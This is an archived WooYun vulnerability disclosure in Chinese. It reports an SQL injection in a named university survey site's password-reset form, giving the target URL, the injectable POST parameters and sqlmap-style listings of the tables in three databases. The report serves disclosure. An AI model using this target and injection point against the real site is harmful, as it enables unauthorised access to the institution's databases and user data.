乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-02: 细节已通知厂商并且等待厂商处理中 2016-05-09: 厂商已经主动忽略漏洞,细节向公众公开
博学,审问,慎思,明辨
注入点:
http://form.pkusz.edu.cn/oqss/user/ForgetPSW.aspxpost参数:Button1=%e9%87%8d%e7%bd%ae%e5%af%86%e7%a0%81&PA=1&PQ=1&UserName=xocfkxww&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBQLV%2b5isDAKvruq2CALw7%2bbwDALw76bwDAKM54rGBv6SFMQHN5UJ5LNXAH5T/7inwSUr&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE3NTkwMTAzNDVkZIIFln7202IZji6%2bywoP6RcVWrgJ&__VIEWSTATEGENERATOR=395425C1
数据库:
数据库表:
Database: OQSS35[144 tables]+---------------------------------------------------+| AnswerPSW || AnsweredSurvey || BBS || Business || City || Color || CondtionTable || Config || CustomizeReport || Dep || EmailAccount || ExchangeAward || GULevel || GUTable || HeadFoot || ItemLib || ItemTableExpand || ItemTableExpand || LanTable || OQSSSysInfo || ObserverViewList || OptionCode1 || OptionCode1 || OptionCode2 || OptionTable || PageStyle || PageTable || Profession || Province || Quota || RandomAnswer || Reg || ReviewPoint || SA || SN || SchoolRecord || SendTask || StatResult || StyleLib || SurveyClass || SurveyExpand || SurveyLib || SurveyTable || UserGroup || UserGroup || Z495 || Z523 || Z524 || Z527 || Z528 || Z529 || Z530 || Z532 || Z533 || Z534 || Z535 || Z536 || Z537 || Z538 || Z540 || Z541 || Z544 || Z546 || Z547 || Z549 || Z550 || Z551 || Z552 || Z553 || Z556 || Z557 || Z559 || Z560 || Z561 || Z562 || Z563 || Z565 || Z566 || Z567 || Z570 || Z573 || Z576 || Z577 || Z579 || Z580 || Z582 || Z584 || Z585 || Z587 || Z595 || Z597 || Z598 || Z599 || Z602 || Z607 || Z615 || Z618 || Z621 || Z622 || Z623 || Z624 || Z625 || Z627 || Z628 || Z630 || Z631 || Z633 || Z634 || Z637 || Z639 || Z645 || Z647 || Z648 || Z653 || Z654 || Z664 || Z667 || Z668 || Z669 || Z670 || Z672 || Z674 || Z675 || Z679 || Z681 || Z682 || Z683 || Z684 || Z791 || Z792 || Z794 || Z795 || Z800 || Z801 || Z803 || Z804 || Z805 || Z806 || award || dtproperties || enAnswerList || ip || limitsTable || sqlmapoutput |+---------------------------------------------------+Database: master[291 tables]+---------------------------------------------------+| INFORMATION_SCHEMA.CHECK_CONSTRAINTS || INFORMATION_SCHEMA.COLUMNS || INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE || INFORMATION_SCHEMA.COLUMN_PRIVILEGES || INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE || INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE || INFORMATION_SCHEMA.DOMAINS || INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS || INFORMATION_SCHEMA.KEY_COLUMN_USAGE || INFORMATION_SCHEMA.PARAMETERS || INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS || INFORMATION_SCHEMA.ROUTINES || INFORMATION_SCHEMA.ROUTINE_COLUMNS || INFORMATION_SCHEMA.SCHEMATA || INFORMATION_SCHEMA.TABLES || INFORMATION_SCHEMA.TABLE_CONSTRAINTS || INFORMATION_SCHEMA.TABLE_PRIVILEGES || INFORMATION_SCHEMA.VIEWS || INFORMATION_SCHEMA.VIEW_COLUMN_USAGE || INFORMATION_SCHEMA.VIEW_TABLE_USAGE || spt_fallback_db || spt_fallback_dev || spt_fallback_usg || spt_monitor || spt_values || sys.all_columns || sys.all_objects || sys.all_parameters || sys.all_sql_modules || sys.all_views || sys.allocation_units || sys.assemblies || sys.assembly_files || sys.assembly_modules || sys.assembly_references || sys.assembly_types || sys.asymmetric_keys || sys.backup_devices || sys.certificates || sys.check_constraints || sys.column_type_usages || sys.column_xml_schema_collection_usages || sys.columns || sys.computed_columns || sys.configurations || sys.conversation_endpoints || sys.conversation_groups || sys.credentials || sys.crypt_properties || sys.data_spaces || sys.database_files || sys.database_mirroring_endpoints || sys.database_mirroring_endpoints || sys.database_mirroring_witnesses || sys.database_permissions || sys.database_principal_aliases || sys.database_principals || sys.database_recovery_status || sys.database_role_members || sys.databases || sys.default_constraints || sys.destination_data_spaces || sys.dm_broker_activated_tasks || sys.dm_broker_connections || sys.dm_broker_forwarded_messages || sys.dm_broker_queue_monitors || sys.dm_clr_appdomains || sys.dm_clr_loaded_assemblies || sys.dm_clr_properties || sys.dm_clr_tasks || sys.dm_db_file_space_usage || sys.dm_db_index_usage_stats || sys.dm_db_mirroring_connections || sys.dm_db_missing_index_details || sys.dm_db_missing_index_group_stats || sys.dm_db_missing_index_groups || sys.dm_db_partition_stats || sys.dm_db_session_space_usage || sys.dm_db_task_space_usage || sys.dm_exec_background_job_queue_stats || sys.dm_exec_background_job_queue_stats || sys.dm_exec_cached_plans || sys.dm_exec_connections || sys.dm_exec_query_memory_grants || sys.dm_exec_query_optimizer_info || sys.dm_exec_query_resource_semaphores || sys.dm_exec_query_stats || sys.dm_exec_query_transformation_stats || sys.dm_exec_requests || sys.dm_exec_sessions || sys.dm_fts_active_catalogs || sys.dm_fts_index_population || sys.dm_fts_memory_buffers || sys.dm_fts_memory_pools || sys.dm_fts_population_ranges || sys.dm_io_backup_tapes || sys.dm_io_cluster_shared_drives || sys.dm_io_pending_io_requests || sys.dm_os_buffer_descriptors || sys.dm_os_child_instances || sys.dm_os_cluster_nodes || sys.dm_os_hosts || sys.dm_os_latch_stats || sys.dm_os_loaded_modules || sys.dm_os_memory_allocations || sys.dm_os_memory_cache_clock_hands || sys.dm_os_memory_cache_counters || sys.dm_os_memory_cache_entries || sys.dm_os_memory_cache_hash_tables || sys.dm_os_memory_clerks || sys.dm_os_memory_objects || sys.dm_os_memory_pools || sys.dm_os_performance_counters || sys.dm_os_ring_buffers || sys.dm_os_schedulers || sys.dm_os_stacks || sys.dm_os_sublatches || sys.dm_os_sys_info || sys.dm_os_tasks || sys.dm_os_threads || sys.dm_os_virtual_address_dump || sys.dm_os_wait_stats || sys.dm_os_waiting_tasks || sys.dm_os_worker_local_storage || sys.dm_os_workers || sys.dm_qn_subscriptions || sys.dm_repl_articles || sys.dm_repl_schemas || sys.dm_repl_tranhash || sys.dm_repl_traninfo || sys.dm_tran_active_snapshot_database_transactions || sys.dm_tran_active_transactions || sys.dm_tran_current_snapshot || sys.dm_tran_current_transaction || sys.dm_tran_database_transactions || sys.dm_tran_locks || sys.dm_tran_session_transactions || sys.dm_tran_top_version_generators || sys.dm_tran_transactions_snapshot || sys.dm_tran_version_store || sys.endpoint_webmethods || sys.endpoints || sys.event_notification_event_types || sys.event_notifications || sys.events || sys.extended_procedures || sys.extended_properties || sys.filegroups || sys.foreign_key_columns || sys.foreign_keys || sys.fulltext_catalogs || sys.fulltext_document_types || sys.fulltext_index_catalog_usages || sys.fulltext_index_columns || sys.fulltext_indexes || sys.fulltext_languages || sys.http_endpoints || sys.identity_columns || sys.index_columns || sys.indexes || sys.internal_tables || sys.key_constraints || sys.key_encryptions || sys.linked_logins || sys.login_token || sys.master_files || sys.master_key_passwords || sys.message_type_xml_schema_collection_usages || sys.messages || sys.module_assembly_usages || sys.numbered_procedure_parameters || sys.numbered_procedures || sys.objects || sys.openkeys || sys.parameter_type_usages || sys.parameter_xml_schema_collection_usages || sys.parameters || sys.partition_functions || sys.partition_parameters || sys.partition_range_values || sys.partition_schemes || sys.partitions || sys.plan_guides || sys.procedures || sys.remote_logins || sys.remote_service_bindings || sys.routes || sys.schemas || sys.securable_classes || sys.server_assembly_modules || sys.server_event_notifications || sys.server_events || sys.server_permissions || sys.server_principals || sys.server_role_members || sys.server_sql_modules || sys.server_trigger_events || sys.server_triggers || sys.servers || sys.service_broker_endpoints || sys.service_contract_message_usages || sys.service_contract_usages || sys.service_contracts || sys.service_message_types || sys.service_queue_usages || sys.service_queues || sys.services || sys.soap_endpoints || sys.sql_dependencies || sys.sql_logins || sys.sql_modules || sys.stats_columns || sys.stats_columns || sys.symmetric_keys || sys.synonyms || sys.sysaltfiles || sys.syscacheobjects || sys.syscharsets || sys.syscolumns || sys.syscomments || sys.sysconfigures || sys.sysconstraints || sys.syscurconfigs || sys.syscursorcolumns || sys.syscursorrefs || sys.syscursors || sys.syscursortables || sys.sysdatabases || sys.sysdepends || sys.sysdevices || sys.sysfilegroups || sys.sysfiles || sys.sysforeignkeys || sys.sysfulltextcatalogs || sys.sysindexes || sys.sysindexkeys || sys.syslanguages || sys.syslockinfo || sys.syslogins || sys.sysmembers || sys.sysmessages || sys.sysobjects || sys.sysoledbusers || sys.sysopentapes || sys.sysperfinfo || sys.syspermissions || sys.sysprocesses || sys.sysprotects || sys.sysreferences || sys.sysremotelogins || sys.syssegments || sys.sysservers || sys.system_columns || sys.system_components_surface_area_configuration || sys.system_internals_allocation_units || sys.system_internals_partition_columns || sys.system_internals_partitions || sys.system_objects || sys.system_parameters || sys.system_sql_modules || sys.system_views || sys.systypes || sys.sysusers || sys.tables || sys.tcp_endpoints || sys.trace_categories || sys.trace_columns || sys.trace_event_bindings || sys.trace_events || sys.trace_subclass_values || sys.traces || sys.transmission_queue || sys.trigger_events || sys.triggers || sys.type_assembly_usages || sys.types || sys.user_token || sys.via_endpoints || sys.views || sys.xml_indexes || sys.xml_schema_attributes || sys.xml_schema_collections || sys.xml_schema_component_placements || sys.xml_schema_components || sys.xml_schema_elements || sys.xml_schema_facets || sys.xml_schema_model_groups || sys.xml_schema_namespaces || sys.xml_schema_types || sys.xml_schema_wildcard_namespaces || sys.xml_schema_wildcards |+---------------------------------------------------+Database: msdb[9 tables]+---------------------------------------------------+| backupfile || backupmediafamily || backupmediaset || backupset || logmarkhistory || restorefilegroup || restorefilegroup || restorehistory || suspect_pages |+---------------------------------------------------+
仅证明危害,不深入。
过滤希望学校的网站越来越安全!
危害等级:无影响厂商忽略
忽略时间:2016-05-09 09:00
漏洞Rank:4 (WooYun评价)
暂无